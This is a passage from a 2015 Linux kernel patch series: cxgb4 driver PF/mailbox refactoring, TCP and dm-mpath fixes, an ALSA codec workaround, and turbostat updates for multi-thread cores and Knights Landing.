adap->fn, 0, 1, + ret = t4_set_params(adap, adap->mbox, adap->pf, 0, 1, ¶m, &val); if (ret) dev_warn(adap->pdev_dev, "Failed to set Congestion" @@ -2606,7 +2606,7 @@ int t4_sge_alloc_eth_txq(struct adapter *adap, struct sge_eth_txq *txq, memset(&c, 0, sizeof(c)); c.op_to_vfn = htonl(FW_CMD_OP_V(FW_EQ_ETH_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F | FW_CMD_EXEC_F | - FW_EQ_ETH_CMD_PFN_V(adap->fn) | + FW_EQ_ETH_CMD_PFN_V(adap->pf) | FW_EQ_ETH_CMD_VFN_V(0)); c.alloc_to_len16 = htonl(FW_EQ_ETH_CMD_ALLOC_F | FW_EQ_ETH_CMD_EQSTART_F | FW_LEN16(c)); @@ -2623,7 +2623,7 @@ int t4_sge_alloc_eth_txq(struct adapter *adap, struct sge_eth_txq *txq, FW_EQ_ETH_CMD_EQSIZE_V(nentries)); c.eqaddr = cpu_to_be64(txq->q.phys_addr); - ret = t4_wr_mbox(adap, adap->fn, &c, sizeof(c), &c); + ret = t4_wr_mbox(adap, adap->mbox, &c, sizeof(c), &c); if (ret) { kfree(txq->q.sdesc); txq->q.sdesc = NULL; @@ -2661,7 +2661,7 @@ int t4_sge_alloc_ctrl_txq(struct adapter *adap, struct sge_ctrl_txq *txq, c.op_to_vfn = htonl(FW_CMD_OP_V(FW_EQ_CTRL_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F | FW_CMD_EXEC_F | - FW_EQ_CTRL_CMD_PFN_V(adap->fn) | + FW_EQ_CTRL_CMD_PFN_V(adap->pf) | FW_EQ_CTRL_CMD_VFN_V(0)); c.alloc_to_len16 = htonl(FW_EQ_CTRL_CMD_ALLOC_F | FW_EQ_CTRL_CMD_EQSTART_F | FW_LEN16(c)); @@ -2678,7 +2678,7 @@ int t4_sge_alloc_ctrl_txq(struct adapter *adap, struct sge_ctrl_txq *txq, FW_EQ_CTRL_CMD_EQSIZE_V(nentries)); c.eqaddr = cpu_to_be64(txq->q.phys_addr); - ret = t4_wr_mbox(adap, adap->fn, &c, sizeof(c), &c); + ret = t4_wr_mbox(adap, adap->mbox, &c, sizeof(c), &c); if (ret) { dma_free_coherent(adap->pdev_dev, nentries * sizeof(struct tx_desc), @@ -2716,7 +2716,7 @@ int t4_sge_alloc_ofld_txq(struct adapter *adap, struct sge_ofld_txq *txq, memset(&c, 0, sizeof(c)); c.op_to_vfn = htonl(FW_CMD_OP_V(FW_EQ_OFLD_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F | FW_CMD_EXEC_F | - FW_EQ_OFLD_CMD_PFN_V(adap->fn) | + FW_EQ_OFLD_CMD_PFN_V(adap->pf) | FW_EQ_OFLD_CMD_VFN_V(0)); c.alloc_to_len16 = htonl(FW_EQ_OFLD_CMD_ALLOC_F | FW_EQ_OFLD_CMD_EQSTART_F | FW_LEN16(c)); @@ -2731,7 +2731,7 @@ int t4_sge_alloc_ofld_txq(struct adapter *adap, struct sge_ofld_txq *txq, FW_EQ_OFLD_CMD_EQSIZE_V(nentries)); c.eqaddr = cpu_to_be64(txq->q.phys_addr); - ret = t4_wr_mbox(adap, adap->fn, &c, sizeof(c), &c); + ret = t4_wr_mbox(adap, adap->mbox, &c, sizeof(c), &c); if (ret) { kfree(txq->q.sdesc); txq->q.sdesc = NULL; @@ -2770,7 +2770,7 @@ static void free_rspq_fl(struct adapter *adap, struct sge_rspq *rq, unsigned int fl_id = fl ? fl->cntxt_id : 0xffff; adap->sge.ingr_map[rq->cntxt_id - adap->sge.ingr_start] = NULL; - t4_iq_free(adap, adap->fn, adap->fn, 0, FW_IQ_TYPE_FL_INT_CAP, + t4_iq_free(adap, adap->mbox, adap->pf, 0, FW_IQ_TYPE_FL_INT_CAP, rq->cntxt_id, fl_id, 0xffff); dma_free_coherent(adap->pdev_dev, (rq->size + 1) * rq->iqe_len, rq->desc, rq->phys_addr); @@ -2825,7 +2825,7 @@ void t4_free_sge_resources(struct adapter *adap) free_rspq_fl(adap, &eq->rspq, eq->fl.size ? 
&eq->fl : NULL); if (etq->q.desc) { - t4_eth_eq_free(adap, adap->fn, adap->fn, 0, + t4_eth_eq_free(adap, adap->mbox, adap->pf, 0, etq->q.cntxt_id); free_tx_desc(adap, &etq->q, etq->q.in_use, true); kfree(etq->q.sdesc); @@ -2844,7 +2844,7 @@ void t4_free_sge_resources(struct adapter *adap) if (q->q.desc) { tasklet_kill(&q->qresume_tsk); - t4_ofld_eq_free(adap, adap->fn, adap->fn, 0, + t4_ofld_eq_free(adap, adap->mbox, adap->pf, 0, q->q.cntxt_id); free_tx_desc(adap, &q->q, q->q.in_use, false); kfree(q->q.sdesc); @@ -2859,7 +2859,7 @@ void t4_free_sge_resources(struct adapter *adap) if (cq->q.desc) { tasklet_kill(&cq->qresume_tsk); - t4_ctrl_eq_free(adap, adap->fn, adap->fn, 0, + t4_ctrl_eq_free(adap, adap->mbox, adap->pf, 0, cq->q.cntxt_id); __skb_queue_purge(&cq->sendq); free_txq(adap, &cq->q); diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 7b92f0f86205..36a858c24305 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -150,7 +150,7 @@ void t4_write_indirect(struct adapter *adap, unsigned int addr_reg, */ void t4_hw_pci_read_cfg4(struct adapter *adap, int reg, u32 *val) { - u32 req = ENABLE_F | FUNCTION_V(adap->fn) | REGISTER_V(reg); + u32 req = ENABLE_F | FUNCTION_V(adap->pf) | REGISTER_V(reg); if (is_t4(adap->params.chip)) req |= LOCALCFG_F; @@ -412,7 +412,7 @@ int t4_memory_rw(struct adapter *adap, int win, int mtype, u32 addr, mem_base = PCIEOFST_G(mem_reg) << PCIEOFST_SHIFT_X; if (is_t4(adap->params.chip)) mem_base -= adap->t4_bar0; - win_pf = is_t4(adap->params.chip) ? 0 : PFNUM_V(adap->fn); + win_pf = is_t4(adap->params.chip) ? 0 : PFNUM_V(adap->pf); /* Calculate our initial PCI-E Memory Window Position and Offset into * that Window. 
@@ -547,7 +547,7 @@ u32 t4_read_pcie_cfg4(struct adapter *adap, int reg) ldst_cmd.cycles_to_len16 = cpu_to_be32(FW_LEN16(ldst_cmd)); ldst_cmd.u.pcie.select_naccess = FW_LDST_CMD_NACCESS_V(1); ldst_cmd.u.pcie.ctrl_to_fn = - (FW_LDST_CMD_LC_F | FW_LDST_CMD_FN_V(adap->fn)); + (FW_LDST_CMD_LC_F | FW_LDST_CMD_FN_V(adap->pf)); ldst_cmd.u.pcie.r = reg; /* If the LDST Command succeeds, return the result, otherwise @@ -2062,7 +2062,7 @@ int t4_phy_fw_ver(struct adapter *adap, int *phy_fw_ver) FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_PHYFW) | FW_PARAMS_PARAM_Y_V(adap->params.portvec) | FW_PARAMS_PARAM_Z_V(FW_PARAMS_PARAM_DEV_PHYFW_VERSION)); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 1, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 1, ¶m, &val); if (ret < 0) return ret; @@ -2134,7 +2134,7 @@ int t4_load_phy_fw(struct adapter *adap, FW_PARAMS_PARAM_Y_V(adap->params.portvec) | FW_PARAMS_PARAM_Z_V(FW_PARAMS_PARAM_DEV_PHYFW_DOWNLOAD)); val = phy_fw_size; - ret = t4_query_params_rw(adap, adap->mbox, adap->fn, 0, 1, + ret = t4_query_params_rw(adap, adap->mbox, adap->pf, 0, 1, ¶m, &val, 1); if (ret < 0) return ret; @@ -2163,7 +2163,7 @@ int t4_load_phy_fw(struct adapter *adap, FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_PHYFW) | FW_PARAMS_PARAM_Y_V(adap->params.portvec) | FW_PARAMS_PARAM_Z_V(FW_PARAMS_PARAM_DEV_PHYFW_DOWNLOAD)); - ret = t4_set_params_timeout(adap, adap->mbox, adap->fn, 0, 1, + ret = t4_set_params_timeout(adap, adap->mbox, adap->pf, 0, 1, ¶m, &val, 30000); /* If we have version number support, then check to see that the new @@ -2199,7 +2199,7 @@ int t4_fwcache(struct adapter *adap, enum fw_params_param_dev_fwcache op) c.op_to_vfn = cpu_to_be32(FW_CMD_OP_V(FW_PARAMS_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F | - FW_PARAMS_CMD_PFN_V(adap->fn) | + FW_PARAMS_CMD_PFN_V(adap->pf) | FW_PARAMS_CMD_VFN_V(0)); c.retval_len16 = cpu_to_be32(FW_LEN16(c)); c.param[0].mnem = @@ -5299,7 +5299,7 @@ int t4_prep_adapter(struct adapter *adapter) } /** - * cxgb4_t4_bar2_sge_qregs - return BAR2 SGE Queue register information + * t4_bar2_sge_qregs - return BAR2 SGE Queue register information * @adapter: the adapter * @qid: the Queue ID * @qtype: the Ingress or Egress type for @qid @@ -5323,7 +5323,7 @@ int t4_prep_adapter(struct adapter *adapter) * Write Combining Doorbell Buffer. If the BAR2 Queue ID is not 0, * then these "Inferred Queue ID" register may not be used. */ -int cxgb4_t4_bar2_sge_qregs(struct adapter *adapter, +int t4_bar2_sge_qregs(struct adapter *adapter, unsigned int qid, enum t4_bar2_qtype qtype, u64 *pbar2_qoffset, @@ -5457,13 +5457,13 @@ int t4_init_sge_params(struct adapter *adapter) */ hps = t4_read_reg(adapter, SGE_HOST_PAGE_SIZE_A); s_hps = (HOSTPAGESIZEPF0_S + - (HOSTPAGESIZEPF1_S - HOSTPAGESIZEPF0_S) * adapter->fn); + (HOSTPAGESIZEPF1_S - HOSTPAGESIZEPF0_S) * adapter->pf); sge_params->hps = ((hps >> s_hps) & HOSTPAGESIZEPF0_M); /* Extract the SGE Egress and Ingess Queues Per Page for our PF. 
*/ s_qpp = (QUEUESPERPAGEPF0_S + - (QUEUESPERPAGEPF1_S - QUEUESPERPAGEPF0_S) * adapter->fn); + (QUEUESPERPAGEPF1_S - QUEUESPERPAGEPF0_S) * adapter->pf); qpp = t4_read_reg(adapter, SGE_EGRESS_QUEUES_PER_PAGE_PF_A); sge_params->eq_qpp = ((qpp >> s_qpp) & QUEUESPERPAGEPF0_M); qpp = t4_read_reg(adapter, SGE_INGRESS_QUEUES_PER_PAGE_PF_A); diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/sge.c b/drivers/net/ethernet/chelsio/cxgb4vf/sge.c index 2e41d1541d73..be4ab09d11d7 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/sge.c +++ b/drivers/net/ethernet/chelsio/cxgb4vf/sge.c @@ -2162,8 +2162,8 @@ static void __iomem *bar2_address(struct adapter *adapter, u64 bar2_qoffset; int ret; - ret = t4_bar2_sge_qregs(adapter, qid, qtype, - &bar2_qoffset, pbar2_qid); + ret = t4vf_bar2_sge_qregs(adapter, qid, qtype, + &bar2_qoffset, pbar2_qid); if (ret) return NULL; diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h index b9debb4f29a3..75df25970d5e 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h +++ b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h @@ -284,11 +284,11 @@ int t4vf_fw_reset(struct adapter *); int t4vf_set_params(struct adapter *, unsigned int, const u32 *, const u32 *); enum t4_bar2_qtype { T4_BAR2_QTYPE_EGRESS, T4_BAR2_QTYPE_INGRESS }; -int t4_bar2_sge_qregs(struct adapter *adapter, - unsigned int qid, - enum t4_bar2_qtype qtype, - u64 *pbar2_qoffset, - unsigned int *pbar2_qid); +int t4vf_bar2_sge_qregs(struct adapter *adapter, + unsigned int qid, + enum t4_bar2_qtype qtype, + u64 *pbar2_qoffset, + unsigned int *pbar2_qid); int t4vf_get_sge_params(struct adapter *); int t4vf_get_vpd_params(struct adapter *); diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c index 966ee900ed00..135909ecbc0f 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c @@ -428,7 +428,7 @@ int t4vf_set_params(struct adapter *adapter, unsigned int nparams, } /** - * t4_bar2_sge_qregs - return BAR2 SGE Queue register information + * t4vf_bar2_sge_qregs - return BAR2 SGE Queue register information * @adapter: the adapter * @qid: the Queue ID * @qtype: the Ingress or Egress type for @qid @@ -452,11 +452,11 @@ int t4vf_set_params(struct adapter *adapter, unsigned int nparams, * Write Combining Doorbell Buffer. If the BAR2 Queue ID is not 0, * then these "Inferred Queue ID" register may not be used. */ -int t4_bar2_sge_qregs(struct adapter *adapter, - unsigned int qid, - enum t4_bar2_qtype qtype, - u64 *pbar2_qoffset, - unsigned int *pbar2_qid) +int t4vf_bar2_sge_qregs(struct adapter *adapter, + unsigned int qid, + enum t4_bar2_qtype qtype, + u64 *pbar2_qoffset, + unsigned int *pbar2_qid) { unsigned int page_shift, page_size, qpp_shift, qpp_mask; u64 bar2_page_offset, bar2_qoffset; From e2baad9e4b153c67dddc5ccf987395b842329c84 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 27 May 2015 10:46:02 -0700 Subject: [PATCH 322/872] tcp: connect() from bound sockets can be faster __inet_hash_connect() does not use its third argument (port_offset) if socket was already bound to a source port. No need to perform useless but expensive md5 computations. Reported-by: Crestez Dan Leonard Signed-off-by: Eric Dumazet Signed-off-by: David S. 
Miller --- net/ipv4/inet_hashtables.c | 9 +++++++-- net/ipv6/inet6_hashtables.c | 8 ++++++-- 2 files changed, 13 insertions(+), 4 deletions(-) diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c index 1b336dc179f8..5f9b063bbe8a 100644 --- a/net/ipv4/inet_hashtables.c +++ b/net/ipv4/inet_hashtables.c @@ -394,9 +394,10 @@ static int __inet_check_established(struct inet_timewait_death_row *death_row, return -EADDRNOTAVAIL; } -static inline u32 inet_sk_port_offset(const struct sock *sk) +static u32 inet_sk_port_offset(const struct sock *sk) { const struct inet_sock *inet = inet_sk(sk); + return secure_ipv4_port_ephemeral(inet->inet_rcv_saddr, inet->inet_daddr, inet->inet_dport); @@ -600,7 +601,11 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row, int inet_hash_connect(struct inet_timewait_death_row *death_row, struct sock *sk) { - return __inet_hash_connect(death_row, sk, inet_sk_port_offset(sk), + u32 port_offset = 0; + + if (!inet_sk(sk)->inet_num) + port_offset = inet_sk_port_offset(sk); + return __inet_hash_connect(death_row, sk, port_offset, __inet_check_established); } EXPORT_SYMBOL_GPL(inet_hash_connect); diff --git a/net/ipv6/inet6_hashtables.c b/net/ipv6/inet6_hashtables.c index 871641bc1ed4..b4fd96de97e6 100644 --- a/net/ipv6/inet6_hashtables.c +++ b/net/ipv6/inet6_hashtables.c @@ -257,7 +257,7 @@ static int __inet6_check_established(struct inet_timewait_death_row *death_row, return -EADDRNOTAVAIL; } -static inline u32 inet6_sk_port_offset(const struct sock *sk) +static u32 inet6_sk_port_offset(const struct sock *sk) { const struct inet_sock *inet = inet_sk(sk); @@ -269,7 +269,11 @@ static inline u32 inet6_sk_port_offset(const struct sock *sk) int inet6_hash_connect(struct inet_timewait_death_row *death_row, struct sock *sk) { - return __inet_hash_connect(death_row, sk, inet6_sk_port_offset(sk), + u32 port_offset = 0; + + if (!inet_sk(sk)->inet_num) + port_offset = inet6_sk_port_offset(sk); + return __inet_hash_connect(death_row, sk, port_offset, __inet6_check_established); } EXPORT_SYMBOL_GPL(inet6_hash_connect); From ed2dfd900992aa7b6b3d0abd8ec9a7e9d2c7f827 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 27 May 2015 11:34:37 -0700 Subject: [PATCH 323/872] tcp/dccp: warn user for preferred ip_local_port_range After commit 07f4c90062f8f ("tcp/dccp: try to not exhaust ip_local_port_range in connect()") it is advised to have an even number of ports described in /proc/sys/net/ipv4/ip_local_port_range This means start/end values should have a different parity. Let's warn sysadmins of this, so that they can update their settings if they want to. Suggested-by: David S. Miller Signed-off-by: Eric Dumazet Signed-off-by: David S. 
Miller --- include/net/netns/ipv4.h | 1 + net/ipv4/sysctl_net_ipv4.c | 6 ++++++ 2 files changed, 7 insertions(+) diff --git a/include/net/netns/ipv4.h b/include/net/netns/ipv4.h index 6848b8bb2e63..c68926b4899c 100644 --- a/include/net/netns/ipv4.h +++ b/include/net/netns/ipv4.h @@ -19,6 +19,7 @@ struct sock; struct local_ports { seqlock_t lock; int range[2]; + bool warned; }; struct ping_group_range { diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c index e64892769607..0330ab2e2b63 100644 --- a/net/ipv4/sysctl_net_ipv4.c +++ b/net/ipv4/sysctl_net_ipv4.c @@ -45,7 +45,13 @@ static int ip_ping_group_range_max[] = { GID_T_MAX, GID_T_MAX }; /* Update system visible IP port range */ static void set_local_port_range(struct net *net, int range[2]) { + bool same_parity = !((range[0] ^ range[1]) & 1); + write_seqlock(&net->ipv4.ip_local_ports.lock); + if (same_parity && !net->ipv4.ip_local_ports.warned) { + net->ipv4.ip_local_ports.warned = true; + pr_err_ratelimited("ip_local_port_range: prefer different parity for start/end values.\n"); + } net->ipv4.ip_local_ports.range[0] = range[0]; net->ipv4.ip_local_ports.range[1] = range[1]; write_sequnlock(&net->ipv4.ip_local_ports.lock); From c545f799c7470682756ca64c63f6bfcdaf28442b Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 27 May 2015 21:20:12 +0200 Subject: [PATCH 324/872] ALSA: hda - Disable power_save_node for IDT92HD71bxx We've got a regression report that 4.1-rc causes noises on a Dell laptop. Similar like Realtek codec, this seems also triggered by the recent power_save_node feature. As this kind of issue is quite hard to debug without actual hardware, disable the power_save_node flag for this codec as a workaround. Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=98971 Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_sigmatel.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/sound/pci/hda/patch_sigmatel.c b/sound/pci/hda/patch_sigmatel.c index 0de0fd95144a..6833c74ed6ff 100644 --- a/sound/pci/hda/patch_sigmatel.c +++ b/sound/pci/hda/patch_sigmatel.c @@ -4696,7 +4696,8 @@ static int patch_stac92hd71bxx(struct hda_codec *codec) return err; spec = codec->spec; - codec->power_save_node = 1; + /* disabled power_save_node since it causes noises on a Dell machine */ + /* codec->power_save_node = 1; */ spec->linear_tone_beep = 0; spec->gen.own_eapd_ctl = 1; spec->gen.power_down_unused = 1; From e275b3885dffd31095984ed2476ed0447fa7309a Mon Sep 17 00:00:00 2001 From: Dasaratharaman Chandramouli Date: Wed, 15 Apr 2015 10:09:50 -0700 Subject: [PATCH 325/872] tools/power turbostat: correctly display more than 2 threads/core Without this update, turbostat displays only 2 threads per core. Some processors, such as Xeon Phi, have more. Signed-off-by: Dasaratharaman Chandramouli Signed-off-by: Len Brown --- tools/power/x86/turbostat/turbostat.c | 71 +++++++++++++++++++-------- 1 file changed, 51 insertions(+), 20 deletions(-) diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c index bac98ca3d4ca..d85adbafbe60 100644 --- a/tools/power/x86/turbostat/turbostat.c +++ b/tools/power/x86/turbostat/turbostat.c @@ -1381,12 +1381,41 @@ int parse_int_file(const char *fmt, ...) 
} /* - * cpu_is_first_sibling_in_core(cpu) - * return 1 if given CPU is 1st HT sibling in the core + * get_cpu_position_in_core(cpu) + * return the position of the CPU among its HT siblings in the core + * return -1 if the sibling is not in list */ -int cpu_is_first_sibling_in_core(int cpu) +int get_cpu_position_in_core(int cpu) { - return cpu == parse_int_file("/sys/devices/system/cpu/cpu%d/topology/thread_siblings_list", cpu); + char path[64]; + FILE *filep; + int this_cpu; + char character; + int i; + + sprintf(path, + "/sys/devices/system/cpu/cpu%d/topology/thread_siblings_list", + cpu); + filep = fopen(path, "r"); + if (filep == NULL) { + perror(path); + exit(1); + } + + for (i = 0; i < topo.num_threads_per_core; i++) { + fscanf(filep, "%d", &this_cpu); + if (this_cpu == cpu) { + fclose(filep); + return i; + } + + /* Account for no separator after last thread*/ + if (i != (topo.num_threads_per_core - 1)) + fscanf(filep, "%c", &character); + } + + fclose(filep); + return -1; } /* @@ -1412,25 +1441,31 @@ int get_num_ht_siblings(int cpu) { char path[80]; FILE *filep; - int sib1, sib2; - int matches; + int sib1; + int matches = 0; char character; + char str[100]; + char *ch; sprintf(path, "/sys/devices/system/cpu/cpu%d/topology/thread_siblings_list", cpu); filep = fopen_or_die(path, "r"); + /* * file format: - * if a pair of number with a character between: 2 siblings (eg. 1-2, or 1,4) - * otherwinse 1 sibling (self). + * A ',' separated or '-' separated set of numbers + * (eg 1-2 or 1,3,4,5) */ - matches = fscanf(filep, "%d%c%d\n", &sib1, &character, &sib2); + fscanf(filep, "%d%c\n", &sib1, &character); + fseek(filep, 0, SEEK_SET); + fgets(str, 100, filep); + ch = strchr(str, character); + while (ch != NULL) { + matches++; + ch = strchr(ch+1, character); + } fclose(filep); - - if (matches == 3) - return 2; - else - return 1; + return matches+1; } /* @@ -2755,13 +2790,9 @@ int initialize_counters(int cpu_id) my_package_id = get_physical_package_id(cpu_id); my_core_id = get_core_id(cpu_id); - - if (cpu_is_first_sibling_in_core(cpu_id)) { - my_thread_id = 0; + my_thread_id = get_cpu_position_in_core(cpu_id); + if (!my_thread_id) topo.num_cores++; - } else { - my_thread_id = 1; - } init_counter(EVEN_COUNTERS, my_thread_id, my_core_id, my_package_id, cpu_id); init_counter(ODD_COUNTERS, my_thread_id, my_core_id, my_package_id, cpu_id); From 4c6dd53dd3674c310d7379c6b3273daa9fd95c79 Mon Sep 17 00:00:00 2001 From: Mike Snitzer Date: Wed, 27 May 2015 15:23:56 -0400 Subject: [PATCH 326/872] dm mpath: fix leak of dm_mpath_io structure in blk-mq .queue_rq error path Otherwise kmemleak reported: unreferenced object 0xffff88009b14e2b0 (size 16): comm "fio", pid 4274, jiffies 4294978034 (age 1253.210s) hex dump (first 16 bytes): 40 12 f3 99 01 88 ff ff 00 10 00 00 00 00 00 00 @............... 
backtrace: [] kmemleak_alloc+0x49/0xb0 [] kmem_cache_alloc+0xf8/0x160 [] mempool_alloc_slab+0x10/0x20 [] mempool_alloc+0x57/0x150 [] __multipath_map.isra.17+0xe1/0x220 [dm_multipath] [] multipath_clone_and_map+0x15/0x20 [dm_multipath] [] map_request.isra.39+0xd5/0x220 [dm_mod] [] dm_mq_queue_rq+0x134/0x240 [dm_mod] [] __blk_mq_run_hw_queue+0x1d5/0x380 [] blk_mq_run_hw_queue+0xc5/0x100 [] blk_sq_make_request+0x240/0x300 [] generic_make_request+0xc0/0x110 [] submit_bio+0x72/0x150 [] do_blockdev_direct_IO+0x1f3b/0x2da0 [] __blockdev_direct_IO+0x3e/0x40 [] ext4_direct_IO+0x1aa/0x390 Fixes: e5863d9ad ("dm: allocate requests in target when stacking on blk-mq devices") Reported-by: Bart Van Assche Signed-off-by: Mike Snitzer Cc: stable@vger.kernel.org # 4.0+ --- drivers/md/dm-mpath.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/md/dm-mpath.c b/drivers/md/dm-mpath.c index 63953477a07c..eff7bdd7731d 100644 --- a/drivers/md/dm-mpath.c +++ b/drivers/md/dm-mpath.c @@ -429,9 +429,11 @@ static int __multipath_map(struct dm_target *ti, struct request *clone, /* blk-mq request-based interface */ *__clone = blk_get_request(bdev_get_queue(bdev), rq_data_dir(rq), GFP_ATOMIC); - if (IS_ERR(*__clone)) + if (IS_ERR(*__clone)) { /* ENOMEM, requeue */ + clear_mapinfo(m, map_context); return r; + } (*__clone)->bio = (*__clone)->biotail = NULL; (*__clone)->rq_disk = bdev->bd_disk; (*__clone)->cmd_flags |= REQ_FAILFAST_TRANSPORT; From 45714fbed4556149d7f1730f5bae74f81d5e2cd5 Mon Sep 17 00:00:00 2001 From: Mike Snitzer Date: Wed, 27 May 2015 15:25:27 -0400 Subject: [PATCH 327/872] dm: requeue from blk-mq dm_mq_queue_rq() using BLK_MQ_RQ_QUEUE_BUSY Use BLK_MQ_RQ_QUEUE_BUSY to requeue a blk-mq request directly from the DM blk-mq device's .queue_rq. This cleans up the previous convoluted handling of request requeueing that would return BLK_MQ_RQ_QUEUE_OK (even though it wasn't) and then run blk_mq_requeue_request() followed by blk_mq_kick_requeue_list(). Also, document that DM blk-mq ontop of old request_fn devices cannot fail in clone_rq() since the clone request is preallocated as part of the pdu. Reported-by: Christoph Hellwig Signed-off-by: Mike Snitzer --- drivers/md/dm.c | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index 1c62ed8d09f4..1badfb250a18 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -2754,13 +2754,15 @@ static int dm_mq_queue_rq(struct blk_mq_hw_ctx *hctx, if (dm_table_get_type(map) == DM_TYPE_REQUEST_BASED) { /* clone request is allocated at the end of the pdu */ tio->clone = (void *)blk_mq_rq_to_pdu(rq) + sizeof(struct dm_rq_target_io); - if (!clone_rq(rq, md, tio, GFP_ATOMIC)) - return BLK_MQ_RQ_QUEUE_BUSY; + (void) clone_rq(rq, md, tio, GFP_ATOMIC); queue_kthread_work(&md->kworker, &tio->work); } else { /* Direct call is fine since .queue_rq allows allocations */ - if (map_request(tio, rq, md) == DM_MAPIO_REQUEUE) - dm_requeue_unmapped_original_request(md, rq); + if (map_request(tio, rq, md) == DM_MAPIO_REQUEUE) { + /* Undo dm_start_request() before requeuing */ + rq_completed(md, rq_data_dir(rq), false); + return BLK_MQ_RQ_QUEUE_BUSY; + } } return BLK_MQ_RQ_QUEUE_OK; From fb5d432722e186c656285ccc088e35dbe24f6fd1 Mon Sep 17 00:00:00 2001 From: Dasaratharaman Chandramouli Date: Wed, 20 May 2015 09:49:34 -0700 Subject: [PATCH 328/872] tools/power turbostat: enable turbostat to support Knights Landing (KNL) Changes mainly to account for minor differences in Knights Landing(KNL): 1. 
KNL supports C1 and C6 core states. 2. KNL supports PC2, PC3 and PC6 package states. 3. KNL has a different encoding of the TURBO_RATIO_LIMIT MSR Signed-off-by: Dasaratharaman Chandramouli Signed-off-by: Len Brown --- arch/x86/include/uapi/asm/msr-index.h | 1 + tools/power/x86/turbostat/turbostat.c | 105 +++++++++++++++++++++++++- 2 files changed, 102 insertions(+), 4 deletions(-) diff --git a/arch/x86/include/uapi/asm/msr-index.h b/arch/x86/include/uapi/asm/msr-index.h index c469490db4a8..3c6bb342a48f 100644 --- a/arch/x86/include/uapi/asm/msr-index.h +++ b/arch/x86/include/uapi/asm/msr-index.h @@ -140,6 +140,7 @@ #define MSR_CORE_C3_RESIDENCY 0x000003fc #define MSR_CORE_C6_RESIDENCY 0x000003fd #define MSR_CORE_C7_RESIDENCY 0x000003fe +#define MSR_KNL_CORE_C6_RESIDENCY 0x000003ff #define MSR_PKG_C2_RESIDENCY 0x0000060d #define MSR_PKG_C8_RESIDENCY 0x00000630 #define MSR_PKG_C9_RESIDENCY 0x00000631 diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c index d85adbafbe60..256a5e1de381 100644 --- a/tools/power/x86/turbostat/turbostat.c +++ b/tools/power/x86/turbostat/turbostat.c @@ -52,6 +52,7 @@ unsigned int skip_c0; unsigned int skip_c1; unsigned int do_nhm_cstates; unsigned int do_snb_cstates; +unsigned int do_knl_cstates; unsigned int do_pc2; unsigned int do_pc3; unsigned int do_pc6; @@ -316,7 +317,7 @@ void print_header(void) if (do_nhm_cstates) outp += sprintf(outp, " CPU%%c1"); - if (do_nhm_cstates && !do_slm_cstates) + if (do_nhm_cstates && !do_slm_cstates && !do_knl_cstates) outp += sprintf(outp, " CPU%%c3"); if (do_nhm_cstates) outp += sprintf(outp, " CPU%%c6"); @@ -546,7 +547,7 @@ int format_counters(struct thread_data *t, struct core_data *c, if (!(t->flags & CPU_IS_FIRST_THREAD_IN_CORE)) goto done; - if (do_nhm_cstates && !do_slm_cstates) + if (do_nhm_cstates && !do_slm_cstates && !do_knl_cstates) outp += sprintf(outp, "%8.2f", 100.0 * c->c3/t->tsc); if (do_nhm_cstates) outp += sprintf(outp, "%8.2f", 100.0 * c->c6/t->tsc); @@ -1018,14 +1019,17 @@ int get_counters(struct thread_data *t, struct core_data *c, struct pkg_data *p) if (!(t->flags & CPU_IS_FIRST_THREAD_IN_CORE)) return 0; - if (do_nhm_cstates && !do_slm_cstates) { + if (do_nhm_cstates && !do_slm_cstates && !do_knl_cstates) { if (get_msr(cpu, MSR_CORE_C3_RESIDENCY, &c->c3)) return -6; } - if (do_nhm_cstates) { + if (do_nhm_cstates && !do_knl_cstates) { if (get_msr(cpu, MSR_CORE_C6_RESIDENCY, &c->c6)) return -7; + } else if (do_knl_cstates) { + if (get_msr(cpu, MSR_KNL_CORE_C6_RESIDENCY, &c->c6)) + return -7; } if (do_snb_cstates) @@ -1295,6 +1299,67 @@ dump_nhm_turbo_ratio_limits(void) return; } +static void +dump_knl_turbo_ratio_limits(void) +{ + int cores; + unsigned int ratio; + unsigned long long msr; + int delta_cores; + int delta_ratio; + int i; + + get_msr(0, MSR_NHM_TURBO_RATIO_LIMIT, &msr); + + fprintf(stderr, "cpu0: MSR_NHM_TURBO_RATIO_LIMIT: 